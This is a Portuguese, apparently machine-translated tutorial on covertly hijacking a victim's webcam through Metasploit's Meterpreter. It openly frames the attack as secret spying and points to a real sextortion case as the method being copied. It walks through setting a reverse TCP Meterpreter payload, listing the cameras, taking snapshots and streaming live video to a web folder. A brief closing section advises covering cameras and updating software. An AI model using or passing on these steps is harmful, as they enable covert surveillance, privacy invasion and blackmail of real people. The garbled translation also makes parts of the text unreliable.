neste tutorial, vamos dar uma olhada em como podemos invadir uma webcam, secretamente, e remotamente através da internet e dar uma espiadinha no que está acontecendo do outro lado. Usaremos o poderoso Meterpreter e o Kali Linux para invadir a webcam da vítima. Vamos assumir o controlo total da webcam, ligá-la, tirar fotos e até transmitir vídeo ao vivo sem que ninguém descubra.no início de 2014, um hacker foi condenado a 18 meses por fazer isso mesmo ao Miss Teen USA 2013. Ele encontrou uma vulnerabilidade em seu computador (como algum software desatualizado), tirou algumas fotos comprometedoras da webcam e chantageou a vítima para enviar mais fotos. O método que ele usou é exactamente o que vamos tentar aqui.
nosso melhor amigo meterpreter
vai nos ajudar com este hack. Com o Mederpreter podemos controlar a webcam de alguém, instalar um keylogger ou plantar os seus próprios vírus, roubar dados privados e fazer praticamente qualquer coisa no computador da vítima.
para este tutorial, estou assumindo que você já usou um módulo de ataque para explorar uma vulnerabilidade usando o Metasploit (como fazer isso?). Agora vamos a isso.como hackear webcams?
Passo 1: Configurar o interpretador.
Depois de termos explorado com sucesso a vítima, agora temos a opção de definir uma carga útil de nossa escolha. A carga diz ao metasploit o que fazer no computador da vítima assim que ele entrar. O mederpreter é a nossa carga. O seguinte comando configura a nossa carga útil:
set payload windows/meterpreter/reverse_tcp
If the attack was successful, metasploit install automatically meterpreter on the target system and we can move on to hacking the webcam.
Passo 2: Encontre a webcam.
Meterpreter tem um módulo integrado para pesquisar e controlar a webcam do sistema remoto. Podemos começar por procurar se o sistema ainda tem uma webcam ou not.me. o comando abaixo é usado para isso, ele também nos devolve o nome da webcam.
meterpreter > webcam_list
E agora você deve ver as webcam(s) do seu alvo listadas na saída.
Passo 3: Tire instantâneos
Se o último comando nos deu uma webcam nós podemos ir em frente e tirar uma foto:
meterpreter > webcam_snap
E agora você deve ver uma imagem foi salva na pasta /opt/framework3/msf3
Simplesmente cabeça sobre lá
Passo 4: Fluxo de vídeo em tempo real a partir hackeado webcam
Então, nós só tiramos uma foto, vamos ver como obter um fluxo de vídeo ao vivo. Podemos fazer isso digitando o comando abaixo: (Estamos a usar o parâmetro –p
para especificar a pasta que queremos dar ao ficheiro de transmissão de vídeo)
meterpreter > run webcam -p /var/www
Este comando dispara a webcam da vítima e envia o seu resultado de vídeo para /var/www/webcam.htm
. Você pode abrir este arquivo e verificar o que está acontecendo na outra extremidade em um fluxo de vídeo ao vivo.como evitar que a sua própria webcam seja pirateada?
Existem várias maneiras de hackear webcams. No exemplo acima, com apenas alguns pequenos comandos podemos espreitar a webcam da nossa vítima. Qualquer especialista em segurança experiente dir-lhe-á que nenhum sistema é completamente seguro. É por isso que você deve sempre manter suas câmeras cobertas quando não em uso. Pessoalmente, uso este pequeno dispositivo no meu portátil e no smartphone.
mas isso não significa que você não deve se preocupar em manter o seu sistema operacional e aplicações atualizadas, muito pelo contrário na verdade. Se um hacker pode ganhar o controle de sua webcam, seu sistema foi explorado com sucesso, ele é efetivamente agora um bot, um escravo do atacante. Isso significa que o atacante pode fazer qualquer coisa em seu sistema: acessar seus dados privados, ver qualquer coisa que você digite, bem como todos os sites que você visita.
Que dispositivo está a usar neste momento? Um smartphone? Um portátil? É provável que estejas a olhar directamente para uma câmara. De repente, sentes-te um pouco desconfortável? Devias. Não corras riscos. Se você simplesmente encobrir suas câmeras e atualizar rotineiramente todo o seu software você pode evitar ser vítima de uma invasão webcam você mesmo.